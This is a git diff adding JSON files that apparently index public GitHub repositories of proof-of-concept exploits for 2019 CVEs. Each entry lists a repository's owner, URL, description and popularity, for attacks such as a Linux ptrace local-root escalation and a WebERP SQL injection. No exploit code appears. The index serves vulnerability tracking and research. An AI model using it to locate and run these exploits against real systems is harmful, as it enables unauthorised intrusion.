b/2019/CVE-2019-1315.json @@ -0,0 +1,33 @@ +[ + { + "id": 218240051, + "name": "CVE-2019-1315", + "full_name": "Mayter\/CVE-2019-1315", + "owner": { + "login": "Mayter", + "id": 6148807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6148807?v=4", + "html_url": "https:\/\/github.com\/Mayter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mayter\/CVE-2019-1315", + "description": null, + "fork": false, + "created_at": "2019-10-29T08:36:25Z", + "updated_at": "2024-08-22T21:43:56Z", + "pushed_at": "2019-10-29T08:46:08Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13272.json b/2019/CVE-2019-13272.json new file mode 100644 index 0000000000..93b2b54997 --- /dev/null +++ b/2019/CVE-2019-13272.json @@ -0,0 +1,529 @@ +[ + { + "id": 199781061, + "name": "CVE-2019-13272", + "full_name": "jas502n\/CVE-2019-13272", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-13272", + "description": "Linux 4.10 < 5.1.17 PTRACE_TRACEME local root", + "fork": false, + "created_at": "2019-07-31T04:51:43Z", + "updated_at": "2024-11-19T07:16:36Z", + "pushed_at": "2019-08-01T16:02:59Z", + "stargazers_count": 327, + "watchers_count": 327, + "has_discussions": false, + "forks_count": 108, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 108, + "watchers": 327, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 199794841, + "name": "CVE-2019-13272", + "full_name": "Cyc1eC\/CVE-2019-13272", + "owner": { + "login": "Cyc1eC", + "id": 26767829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767829?v=4", + "html_url": "https:\/\/github.com\/Cyc1eC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyc1eC\/CVE-2019-13272", + "description": "The exploit for CVE-2019-13272", + "fork": false, + "created_at": "2019-07-31T06:36:21Z", + "updated_at": "2024-08-12T19:51:33Z", + "pushed_at": "2019-07-31T07:05:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 200459882, + "name": "cve-2019-13272", + "full_name": "bigbigliang-malwarebenchmark\/cve-2019-13272", + "owner": { + "login": "bigbigliang-malwarebenchmark", + "id": 45776349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45776349?v=4", + "html_url": "https:\/\/github.com\/bigbigliang-malwarebenchmark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigbigliang-malwarebenchmark\/cve-2019-13272", + "description": "提权漏洞", + "fork": false, + "created_at": "2019-08-04T06:51:36Z", + "updated_at": "2024-08-12T19:51:41Z", + "pushed_at": "2019-08-04T07:06:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 200948343, + "name": "CVE-2019-13272", + "full_name": "oneoy\/CVE-2019-13272", + "owner": { + "login": "oneoy", + "id": 38435398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4", + "html_url": "https:\/\/github.com\/oneoy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oneoy\/CVE-2019-13272", + "description": "linux 提权", + "fork": false, + "created_at": "2019-08-07T01:21:26Z", + "updated_at": "2024-08-12T19:51:44Z", + "pushed_at": "2019-08-07T01:21:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 245129315, + "name": "CVE-2019-13272", + "full_name": "polosec\/CVE-2019-13272", + "owner": { + "login": "polosec", + "id": 34666152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34666152?v=4", + "html_url": "https:\/\/github.com\/polosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polosec\/CVE-2019-13272", + "description": "CVE-2019-13272", + "fork": false, + "created_at": "2020-03-05T10:10:19Z", + "updated_at": "2024-08-12T19:58:23Z", + "pushed_at": "2020-03-05T10:16:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 260622118, + "name": "-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272", + "full_name": "sumedhaDharmasena\/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272", + "owner": { + "login": "sumedhaDharmasena", + "id": 43642069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43642069?v=4", + "html_url": "https:\/\/github.com\/sumedhaDharmasena", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sumedhaDharmasena\/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272", + "description": null, + "fork": false, + "created_at": "2020-05-02T05:41:54Z", + "updated_at": "2024-08-12T20:01:00Z", + "pushed_at": "2020-05-02T06:05:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263022112, + "name": "Exploiting-a-Linux-kernel-vulnerability", + "full_name": "Tharana\/Exploiting-a-Linux-kernel-vulnerability", + "owner": { + "login": "Tharana", + "id": 31825168, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31825168?v=4", + "html_url": "https:\/\/github.com\/Tharana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tharana\/Exploiting-a-Linux-kernel-vulnerability", + "description": "Local Root vulnerability- CVE-2019-13272 \/ Security Bypass Vulnerability – CVE-2019-14287", + "fork": false, + "created_at": "2020-05-11T11:24:29Z", + "updated_at": "2020-05-11T11:31:32Z", + "pushed_at": "2020-05-11T11:30:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 263322619, + "name": "Privilege-Escalation-CVE-2019-13272-", + "full_name": "RashmikaEkanayake\/Privilege-Escalation-CVE-2019-13272-", + "owner": { + "login": "RashmikaEkanayake", + "id": 61092678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61092678?v=4", + "html_url": "https:\/\/github.com\/RashmikaEkanayake", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashmikaEkanayake\/Privilege-Escalation-CVE-2019-13272-", + "description": null, + "fork": false, + "created_at": "2020-05-12T11:53:55Z", + "updated_at": "2020-05-12T11:57:58Z", + "pushed_at": "2020-05-12T11:57:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263412118, + "name": "vulnerability-exploitation", + "full_name": "Tharana\/vulnerability-exploitation", + "owner": { + "login": "Tharana", + "id": 31825168, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31825168?v=4", + "html_url": "https:\/\/github.com\/Tharana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tharana\/vulnerability-exploitation", + "description": "Local Root vulnerability- CVE-2019-13272 \/ Security Bypass Vulnerability – CVE-2019-14287\/Google Android - 'Stagefright' Remote Code Execution - CVE-2015-1538", + "fork": false, + "created_at": "2020-05-12T17:59:48Z", + "updated_at": "2021-09-17T11:03:25Z", + "pushed_at": "2020-05-12T18:13:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 263515561, + "name": "CVE-2019-13272---Documentation", + "full_name": "teddy47\/CVE-2019-13272---Documentation", + "owner": { + "login": "teddy47", + "id": 48222561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48222561?v=4", + "html_url": "https:\/\/github.com\/teddy47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teddy47\/CVE-2019-13272---Documentation", + "description": null, + "fork": false, + "created_at": "2020-05-13T03:28:45Z", + "updated_at": "2020-05-13T03:33:11Z", + "pushed_at": "2020-05-13T03:33:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 305243026, + "name": "CVE-2019-13272", + "full_name": "datntsec\/CVE-2019-13272", + "owner": { + "login": "datntsec", + "id": 70559607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70559607?v=4", + "html_url": "https:\/\/github.com\/datntsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/datntsec\/CVE-2019-13272", + "description": null, + "fork": false, + "created_at": "2020-10-19T02:33:29Z", + "updated_at": "2023-04-17T08:54:07Z", + "pushed_at": "2020-12-25T09:10:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 369313411, + "name": "CVE-2019-13272-Local-Privilege-Escalation", + "full_name": "jana30116\/CVE-2019-13272-Local-Privilege-Escalation", + "owner": { + "login": "jana30116", + "id": 53650676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53650676?v=4", + "html_url": "https:\/\/github.com\/jana30116", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jana30116\/CVE-2019-13272-Local-Privilege-Escalation", + "description": "Local Privilege Escalation is a way to take advantage of flaws in code or service administration that can manage regular or guest users for particular device activities or transfer root user privileges to master or client. User rights admin. The licenses or privileges may be violated by such undesired amendments, as the system may be disrupted by frequent users unless they have shell or root authorization. So, someone, someone, it may become dangerous and be used to obtain access to a higher level. ", + "fork": false, + "created_at": "2021-05-20T19:13:28Z", + "updated_at": "2021-05-20T19:48:25Z", + "pushed_at": "2021-05-20T19:48:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468151152, + "name": "CVE-2019-13272", + "full_name": "babyshen\/CVE-2019-13272", + "owner": { + "login": "babyshen", + "id": 11402197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11402197?v=4", + "html_url": "https:\/\/github.com\/babyshen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/babyshen\/CVE-2019-13272", + "description": null, + "fork": false, + "created_at": "2022-03-10T01:27:46Z", + "updated_at": "2022-03-10T01:29:13Z", + "pushed_at": "2022-03-10T01:29:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 565617725, + "name": "secureCodingDemo", + "full_name": "GgKendall\/secureCodingDemo", + "owner": { + "login": "GgKendall", + "id": 77352114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77352114?v=4", + "html_url": "https:\/\/github.com\/GgKendall", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GgKendall\/secureCodingDemo", + "description": "fall2022 secure coding CVE-2019-13272 : Linux Kernel Improper Privilege Management Vulnerability", + "fork": false, + "created_at": "2022-11-14T00:07:04Z", + "updated_at": "2022-11-14T16:35:37Z", + "pushed_at": "2022-11-14T00:17:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 687084359, + "name": "CVE-2019-13272", + "full_name": "asepsaepdin\/CVE-2019-13272", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2019-13272", + "description": null, + "fork": false, + "created_at": "2023-09-04T15:16:09Z", + "updated_at": "2023-09-04T15:34:51Z", + "pushed_at": "2023-09-05T15:04:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751072561, + "name": "ptrace_scope-CVE-2019-13272-privilege-escalation", + "full_name": "MDS1GNAL\/ptrace_scope-CVE-2019-13272-privilege-escalation", + "owner": { + "login": "MDS1GNAL", + "id": 149971135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149971135?v=4", + "html_url": "https:\/\/github.com\/MDS1GNAL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MDS1GNAL\/ptrace_scope-CVE-2019-13272-privilege-escalation", + "description": "Es una vulnerabilidad para escalar privilegios en linux.", + "fork": false, + "created_at": "2024-01-31T21:50:04Z", + "updated_at": "2024-02-15T17:19:53Z", + "pushed_at": "2024-03-27T16:37:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817724893, + "name": "CVE-2019-13272", + "full_name": "josemlwdf\/CVE-2019-13272", + "owner": { + "login": "josemlwdf", + "id": 60181010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60181010?v=4", + "html_url": "https:\/\/github.com\/josemlwdf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/josemlwdf\/CVE-2019-13272", + "description": "This is a Python 3 version of this exploit. Hope it works!!!", + "fork": false, + "created_at": "2024-06-20T10:04:13Z", + "updated_at": "2024-07-25T13:41:37Z", + "pushed_at": "2024-07-25T13:41:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13288.json b/2019/CVE-2019-13288.json new file mode 100644 index 0000000000..d2aeebede7 --- /dev/null +++ b/2019/CVE-2019-13288.json @@ -0,0 +1,64 @@ +[ + { + "id": 692392749, + "name": "CVE-2019-13288", + "full_name": "gleaming0\/CVE-2019-13288", + "owner": { + "login": "gleaming0", + "id": 76648555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76648555?v=4", + "html_url": "https:\/\/github.com\/gleaming0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gleaming0\/CVE-2019-13288", + "description": null, + "fork": false, + "created_at": "2023-09-16T10:45:12Z", + "updated_at": "2023-09-16T11:17:59Z", + "pushed_at": "2023-09-16T11:20:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734319941, + "name": "CVE-2019-13288-POC", + "full_name": "Fineas\/CVE-2019-13288-POC", + "owner": { + "login": "Fineas", + "id": 9286000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9286000?v=4", + "html_url": "https:\/\/github.com\/Fineas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fineas\/CVE-2019-13288-POC", + "description": null, + "fork": false, + "created_at": "2023-12-21T11:46:41Z", + "updated_at": "2023-12-21T15:17:41Z", + "pushed_at": "2023-12-21T12:21:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13292.json b/2019/CVE-2019-13292.json new file mode 100644 index 0000000000..7bb301269c --- /dev/null +++ b/2019/CVE-2019-13292.json @@ -0,0 +1,33 @@ +[ + { + "id": 665811111, + "name": "CVE-2019-13292-WebERP_4.15", + "full_name": "gustanini\/CVE-2019-13292-WebERP_4.15", + "owner": { + "login": "gustanini", + "id": 47717581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47717581?v=4", + "html_url": "https:\/\/github.com\/gustanini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gustanini\/CVE-2019-13292-WebERP_4.15", + "description": "This is a Python3 script that demonstrates an exploit for a Blind SQL Injection vulnerability in WebERP version 4.15.", + "fork": false, + "created_at": "2023-07-13T04:03:44Z", + "updated_at": "2023-09-19T22:57:55Z", + "pushed_at": "2023-07-13T04:05:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1332.json b/2019/CVE-2019-1332.json new file mode 100644 index 0000000000..a043331676 --- /dev/null +++ b/2019/CVE-2019-1332.json @@ -0,0 +1,40 @@ +[ + { + "id": 752722486, + "name": "CVE-2019-1332", + "full_name": "mbadanoiu\/CVE-2019-1332", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2019-1332", + "description": "CVE-2019-1332: Reflected Cross-Site Scripting in Microsoft SQL Server Reporting Services", + "fork": false, + "created_at": "2024-02-04T16:20:49Z", + "updated_at": "2024-02-04T16:32:52Z", + "pushed_at": "2024-02-04T16:30:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cross-site-scripting", + "cve", + "cve-2019-1332", + "cves", + "reflected-xss" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13361.json b/2019/CVE-2019-13361.json new file mode 100644 index 0000000000..6cdc112533 --- /dev/null +++ b/2019/CVE-2019-13361.json @@ -0,0 +1,33 @@ +[ + { + "id": 201811193, + "name": "CVE-2019-13361", + "full_name": "lodi-g\/CVE-2019-13361", + "owner": { + "login": "lodi-g", + "id": 4528943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4528943?v=4", + "html_url": "https:\/\/github.com\/lodi-g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lodi-g\/CVE-2019-13361", + "description": "Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network.", + "fork": false, + "created_at": "2019-08-11T20:21:07Z", + "updated_at": "2024-08-12T19:51:54Z", + "pushed_at": "2019-08-11T20:35:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13403.json b/2019/CVE-2019-13403.json new file mode 100644 index 0000000000..f183a68e32 --- /dev/null +++ b/2019/CVE-2019-13403.json @@ -0,0 +1,33 @@ +[ + { + "id": 196799368, + "name": "CVE-2019-13403", + "full_name": "B3Bo1d\/CVE-2019-13403", + "owner": { + "login": "B3Bo1d", + "id": 19810607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19810607?v=4", + "html_url": "https:\/\/github.com\/B3Bo1d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B3Bo1d\/CVE-2019-13403", + "description": "CVE-2019-13403", + "fork": false, + "created_at": "2019-07-14T05:52:01Z", + "updated_at": "2024-08-12T19:51:02Z", + "pushed_at": "2019-07-14T06:10:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13496.json b/2019/CVE-2019-13496.json new file mode 100644 index 0000000000..99f58f1f7d --- /dev/null +++ b/2019/CVE-2019-13496.json @@ -0,0 +1,33 @@ +[ + { + "id": 219145624, + "name": "CVE-2019-13496", + "full_name": "FurqanKhan1\/CVE-2019-13496", + "owner": { + "login": "FurqanKhan1", + "id": 15893015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15893015?v=4", + "html_url": "https:\/\/github.com\/FurqanKhan1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FurqanKhan1\/CVE-2019-13496", + "description": null, + "fork": false, + "created_at": "2019-11-02T11:41:25Z", + "updated_at": "2024-08-12T19:54:29Z", + "pushed_at": "2019-11-10T20:59:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13497.json b/2019/CVE-2019-13497.json new file mode 100644 index 0000000000..f865234444 --- /dev/null +++ b/2019/CVE-2019-13497.json @@ -0,0 +1,33 @@ +[ + { + "id": 219150734, + "name": "CVE-2019-13497", + "full_name": "FurqanKhan1\/CVE-2019-13497", + "owner": { + "login": "FurqanKhan1", + "id": 15893015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15893015?v=4", + "html_url": "https:\/\/github.com\/FurqanKhan1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FurqanKhan1\/CVE-2019-13497", + "description": null, + "fork": false, + "created_at": "2019-11-02T12:29:26Z", + "updated_at": "2024-08-12T19:54:29Z", + "pushed_at": "2019-11-02T12:38:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13498.json b/2019/CVE-2019-13498.json new file mode 100644 index 0000000000..d70cbe2050 --- /dev/null +++ b/2019/CVE-2019-13498.json @@ -0,0 +1,33 @@ +[ + { + "id": 200299320, + "name": "CVE-2019-13498", + "full_name": "FurqanKhan1\/CVE-2019-13498", + "owner": { + "login": "FurqanKhan1", + "id": 15893015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15893015?v=4", + "html_url": "https:\/\/github.com\/FurqanKhan1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FurqanKhan1\/CVE-2019-13498", + "description": "CVE-2019-13498", + "fork": false, + "created_at": "2019-08-02T21:22:23Z", + "updated_at": "2024-08-12T19:51:38Z", + "pushed_at": "2019-11-10T20:58:40Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1351.json b/2019/CVE-2019-1351.json new file mode 100644 index 0000000000..a6d362cf24 --- /dev/null +++ b/2019/CVE-2019-1351.json @@ -0,0 +1,33 @@ +[ + { + "id": 279172833, + "name": "PruebaCVE20191351", + "full_name": "JonasDL\/PruebaCVE20191351", + "owner": { + "login": "JonasDL", + "id": 50348980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50348980?v=4", + "html_url": "https:\/\/github.com\/JonasDL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JonasDL\/PruebaCVE20191351", + "description": "Prueba de CVE-2019-1351", + "fork": false, + "created_at": "2020-07-13T00:33:43Z", + "updated_at": "2020-07-13T00:43:54Z", + "pushed_at": "2020-07-13T00:43:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13574.json b/2019/CVE-2019-13574.json new file mode 100644 index 0000000000..e176b341e9 --- /dev/null +++ b/2019/CVE-2019-13574.json @@ -0,0 +1,33 @@ +[ + { + "id": 197141535, + "name": "CVE-2019-13574", + "full_name": "masahiro331\/CVE-2019-13574", + "owner": { + "login": "masahiro331", + "id": 20438853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4", + "html_url": "https:\/\/github.com\/masahiro331", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masahiro331\/CVE-2019-13574", + "description": null, + "fork": false, + "created_at": "2019-07-16T07:17:57Z", + "updated_at": "2024-08-12T19:51:06Z", + "pushed_at": "2019-11-01T15:33:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13633.json b/2019/CVE-2019-13633.json new file mode 100644 index 0000000000..3c52a9d64f --- /dev/null +++ b/2019/CVE-2019-13633.json @@ -0,0 +1,33 @@ +[ + { + "id": 304367053, + "name": "CVE-2019-13633", + "full_name": "Security-AVS\/CVE-2019-13633", + "owner": { + "login": "Security-AVS", + "id": 72926885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4", + "html_url": "https:\/\/github.com\/Security-AVS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2019-13633", + "description": null, + "fork": false, + "created_at": "2020-10-15T15:19:58Z", + "updated_at": "2020-10-15T16:38:11Z", + "pushed_at": "2020-10-15T16:38:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1367.json b/2019/CVE-2019-1367.json new file mode 100644 index 0000000000..867fd451c2 --- /dev/null +++ b/2019/CVE-2019-1367.json @@ -0,0 +1,35 @@ +[ + { + "id": 210525167, + "name": "CVE-2019-1367", + "full_name": "mandarenmanman\/CVE-2019-1367", + "owner": { + "login": "mandarenmanman", + "id": 11764268, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11764268?v=4", + "html_url": "https:\/\/github.com\/mandarenmanman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mandarenmanman\/CVE-2019-1367", + "description": "CVE-2019-1367", + "fork": false, + "created_at": "2019-09-24T06:11:10Z", + "updated_at": "2024-08-12T19:53:17Z", + "pushed_at": "2019-09-24T06:13:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-1367" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, 